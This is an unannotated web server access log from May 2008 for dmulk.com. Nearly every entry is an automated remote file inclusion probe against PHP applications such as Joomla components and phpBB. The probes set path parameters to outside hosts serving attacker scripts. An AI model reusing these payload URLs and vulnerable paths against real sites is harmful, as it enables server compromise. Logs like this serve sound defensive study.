69.64.81.28 - - [24/May/2008:11:08:39 -0700] "GET /logs/access_080126.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.178.229 - - [24/May/2008:11:08:55 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
161.58.178.229 - - [24/May/2008:11:08:55 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
161.58.178.229 - - [24/May/2008:11:08:55 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:11:09:21 -0700] "GET /logs/access.log/?errors.php?=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:11:09:27 -0700] "GET /logs/?errors.php?=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 200 48843 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:11:09:28 -0700] "GET /?errors.php?=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:11:09:36 -0700] "GET /logs/access_080120.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:11:10:03 -0700] "GET /logs/access_080215.log/?errors.php?=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.178.229 - - [24/May/2008:11:10:09 -0700] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
161.58.178.229 - - [24/May/2008:11:10:09 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.146.59.231 - - [24/May/2008:11:10:29 -0700] "GET /logs/access_080322.log/inc/cmses/aedatingCMS.php?dir[inc]=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.59.231 - - [24/May/2008:11:10:29 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.241.251.88 - - [24/May/2008:11:10:41 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.liautism.com/components/efnet.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.251.88 - - [24/May/2008:11:10:41 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.liautism.com/components/efnet.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.251.88 - - [24/May/2008:11:10:42 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.liautism.com/components/efnet.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.138.68.129 - - [24/May/2008:11:10:53 -0700] "GET /start.php?s=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.249.77.90 - - [24/May/2008:11:11:31 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.geocities.com/cefill/bangsat/anjing.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.249.77.90 - - [24/May/2008:11:11:31 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.geocities.com/cefill/bangsat/anjing.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:11:11:43 -0700] "GET /logs/access.log/?errors.php?=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:11:11:48 -0700] "GET /logs/access.log/?errors.php?=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:11:11:49 -0700] "GET /logs/?errors.php?=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 200 48843 "-" "libwww-perl/5.803" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:11:11:52 -0700] "GET /?errors.php?=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:11:11:52 -0700] "GET /?errors.php?=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:11:11:53 -0700] "GET /logs/?errors.php?=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 200 48843 "-" "libwww-perl/5.803" "www.dmulk.com"
161.58.178.229 - - [24/May/2008:11:12:06 -0700] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
161.58.178.229 - - [24/May/2008:11:12:06 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:11:12:19 -0700] "GET /logs/access_080215.log/?errors.php?=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:11:12:27 -0700] "GET /logs/access_080215.log/?errors.php?=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.93.56.80 - - [24/May/2008:11:12:33 -0700] "GET /administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://root.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.61.90 - - [24/May/2008:11:12:45 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.mode-gone.net/faq/faq.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [24/May/2008:11:12:45 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.mode-gone.net/faq/faq.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.82.158.2 - - [24/May/2008:11:12:48 -0700] "GET /spaw_control.class.php?spaw_root=http://www.dito.nl/php_content/.htaccess_/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "dmulk.com"
195.82.158.2 - - [24/May/2008:11:12:48 -0700] "GET /logs/spaw_control.class.php?spaw_root=http://www.dito.nl/php_content/.htaccess_/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "dmulk.com"
195.82.158.2 - - [24/May/2008:11:12:51 -0700] "GET /spaw_control.class.php?spaw_root=http://www.dito.nl/php_content/.htaccess_/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
195.82.158.2 - - [24/May/2008:11:12:51 -0700] "GET /logs/spaw_control.class.php?spaw_root=http://www.dito.nl/php_content/.htaccess_/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
209.163.169.99 - - [24/May/2008:11:13:07 -0700] "GET /logs/access_071224.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.163.169.99 - - [24/May/2008:11:13:07 -0700] "GET /logs/language/lang_german/lang_main_album.php?phpbb_root_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.241.251.88 - - [24/May/2008:11:13:19 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.liautism.com/components/efnet.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.251.88 - - [24/May/2008:11:13:20 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.liautism.com/components/efnet.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.251.88 - - [24/May/2008:11:13:20 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.liautism.com/components/efnet.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.163.169.99 - - [24/May/2008:11:13:33 -0700] "GET /logs/access_071214.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:11:13:43 -0700] "GET /logs/access.log//index2.php?mosConfig_live_site=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:11:13:44 -0700] "GET //index2.php?mosConfig_live_site=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:11:13:44 -0700] "GET /logs//index2.php?mosConfig_live_site=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:11:13:47 -0700] "GET /logs/access.log//index2.php?mosConfig_live_site=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:11:13:47 -0700] "GET //index2.php?mosConfig_live_site=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:11:13:48 -0700] "GET /logs//index2.php?mosConfig_live_site=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.146.59.231 - - [24/May/2008:11:14:19 -0700] "GET /logs/access_071224.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.59.231 - - [24/May/2008:11:14:20 -0700] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:11:14:21 -0700] "GET /logs/access_080215.log//index2.php?mosConfig_live_site=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:11:14:30 -0700] "GET /logs/access_080215.log//index2.php?mosConfig_live_site=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.194.33.88 - - [24/May/2008:11:15:10 -0700] "GET /logs/access.log/index.php?incl=http://www.scoutspaloke.be//administrator/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.194.33.88 - - [24/May/2008:11:15:12 -0700] "GET /index.php?incl=http://www.scoutspaloke.be//administrator/backups/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
217.194.33.88 - - [24/May/2008:11:15:12 -0700] "GET /logs/index.php?incl=http://www.scoutspaloke.be//administrator/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.249.77.90 - - [24/May/2008:11:15:30 -0700] "GET /logs/access_080220.log/joomla/index.php?option=com_restaurante&task=http://www.geocities.com/cefill/bangsat/anjing.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.71.36.82 - - [24/May/2008:11:15:35 -0700] "GET /logs/access.log//browse.php?prefix=http://www.dito.nl/php_content/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.71.36.82 - - [24/May/2008:11:15:36 -0700] "GET //browse.php?prefix=http://www.dito.nl/php_content/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.71.36.82 - - [24/May/2008:11:15:36 -0700] "GET /logs//browse.php?prefix=http://www.dito.nl/php_content/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.249.77.90 - - [24/May/2008:11:15:46 -0700] "GET /logs/access_080223.log/joomla/index.php?option=com_restaurante&task=http://www.geocities.com/cefill/bangsat/anjing.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.194.33.88 - - [24/May/2008:11:15:53 -0700] "GET /logs/access_080212.log/index.php?incl=http://www.scoutspaloke.be//administrator/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.93.56.80 - - [24/May/2008:11:15:54 -0700] "GET /logs/access_080109.log/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://root.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.93.56.80 - - [24/May/2008:11:15:54 -0700] "GET /administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://root.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.93.56.80 - - [24/May/2008:11:15:55 -0700] "GET /logs/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://root.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.163.169.99 - - [24/May/2008:11:16:35 -0700] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.37.217.226 - - [24/May/2008:11:16:41 -0700] "GET /logs/access_071219.log//includes/messages.inc.php?include_path=http://kiliclub.com/tmp/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.37.217.226 - - [24/May/2008:11:16:41 -0700] "GET /logs//includes/messages.inc.php?include_path=http://kiliclub.com/tmp/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.71.36.82 - - [24/May/2008:11:17:27 -0700] "GET //browse.php?prefix=http://www.dito.nl/php_content/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:11:17:58 -0700] "GET /logs/access.log/?errors.php?=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:11:18:02 -0700] "GET /logs/access.log/?errors.php?=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:11:18:04 -0700] "GET /logs/?errors.php?=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 200 48843 "-" "libwww-perl/5.803" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:11:18:08 -0700] "GET /logs/?errors.php?=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 200 48843 "-" "libwww-perl/5.803" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:11:18:08 -0700] "GET /?errors.php?=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:11:18:11 -0700] "GET /?errors.php?=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:11:18:33 -0700] "GET /logs/access_080215.log/?errors.php?=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.13.86.241 - - [24/May/2008:11:18:38 -0700] "GET /logs/access_080215.log/?errors.php?=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.194.33.88 - - [24/May/2008:11:18:55 -0700] "GET /logs/index.php?incl=http://www.scoutspaloke.be//administrator/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.194.33.88 - - [24/May/2008:11:19:02 -0700] "GET /index.php?incl=http://www.scoutspaloke.be//administrator/backups/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
82.146.59.231 - - [24/May/2008:11:19:11 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.59.231 - - [24/May/2008:11:19:12 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.15.159.42 - - [24/May/2008:11:20:01 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.centenariosafa.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
64.15.159.42 - - [24/May/2008:11:20:01 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.centenariosafa.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
217.194.33.88 - - [24/May/2008:11:20:57 -0700] "GET /index.php?incl=http://www.scoutspaloke.be//administrator/backups/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.151.18 - - [24/May/2008:11:21:28 -0700] "GET /logs/index.php?content=http://www.tolivealie.com/store/media/a.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
75.125.151.18 - - [24/May/2008:11:21:37 -0700] "GET /index.php?content=http://www.tolivealie.com/store/media/a.txt?? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
64.20.46.121 - - [24/May/2008:11:22:05 -0700] "GET /logs/errors.php?error=http://www.lynnlott.com/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.20.46.121 - - [24/May/2008:11:22:05 -0700] "GET /errors.php?error=http://www.lynnlott.com/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.78.216.197 - - [24/May/2008:11:22:24 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
82.78.216.197 - - [24/May/2008:11:22:24 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
82.78.216.197 - - [24/May/2008:11:22:59 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/koeluna/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:11:23:02 -0700] "GET /logs//include/logout.php?PSA_PATH=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.47.201.117 - - [24/May/2008:11:23:02 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
72.47.201.117 - - [24/May/2008:11:23:03 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
209.163.169.99 - - [24/May/2008:11:23:04 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.163.169.99 - - [24/May/2008:11:23:04 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:11:23:05 -0700] "GET //include/logout.php?PSA_PATH=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.181.74 - - [24/May/2008:11:23:54 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://medisana.co.kr/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:11:24:27 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:11:24:32 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.59.228 - - [24/May/2008:11:24:46 -0700] "GET /logs/senetman/html/index.php?page=http://www.duclaux.net/wiki/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.146.59.228 - - [24/May/2008:11:24:46 -0700] "GET /senetman/html/index.php?page=http://www.duclaux.net/wiki/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.234.200.80 - - [24/May/2008:11:25:12 -0700] "GET /logs/access_080113.log/index.php?place=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.234.200.80 - - [24/May/2008:11:25:18 -0700] "GET /logs/index.php?place=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.234.200.124 - - [24/May/2008:11:25:19 -0700] "GET /logs/access_080113.log/index.php?place=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.80 - - [24/May/2008:11:25:22 -0700] "GET /index.php?place=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
72.16.148.38 - - [24/May/2008:11:25:25 -0700] "GET /logs/senetman/html/index.php?page=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.234.200.124 - - [24/May/2008:11:25:25 -0700] "GET /logs/index.php?place=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.16.148.38 - - [24/May/2008:11:25:26 -0700] "GET /senetman/html/index.php?page=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.163.169.99 - - [24/May/2008:11:25:26 -0700] "GET /logs/access_071224.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.163.169.99 - - [24/May/2008:11:25:26 -0700] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.234.200.124 - - [24/May/2008:11:25:31 -0700] "GET /index.php?place=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 200 11607 "-" "libwww-perl/5.805" "www.dmulk.com"
212.241.193.243 - - [24/May/2008:11:25:43 -0700] "GET /logs/senetman/html/index.php?page=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.241.193.243 - - [24/May/2008:11:25:44 -0700] "GET /senetman/html/index.php?page=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.212.173.74 - - [24/May/2008:11:25:52 -0700] "GET /logs/senetman/html/index.php?page=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [24/May/2008:11:25:52 -0700] "GET /senetman/html/index.php?page=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.134.122 - - [24/May/2008:11:26:22 -0700] "GET /logs/access.log/index.php?option=http://www.freewebtown.com/cioabi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.44.134.122 - - [24/May/2008:11:26:27 -0700] "GET /logs/index.php?option=http://www.freewebtown.com/cioabi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
160.99.12.231 - - [24/May/2008:11:26:28 -0700] "GET /logs/access_080327.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.134.122 - - [24/May/2008:11:26:31 -0700] "GET /index.php?option=http://www.freewebtown.com/cioabi/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
65.36.252.34 - - [24/May/2008:11:26:54 -0700] "GET /logs/include/db.php?GLOBALS[rootdp]=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.36.252.34 - - [24/May/2008:11:26:54 -0700] "GET /include/db.php?GLOBALS[rootdp]=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.108.64.164 - - [24/May/2008:11:27:02 -0700] "GET /logs/access_080117.log/components/com_simpleboard/image_upload.php?sbp=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.164 - - [24/May/2008:11:27:03 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
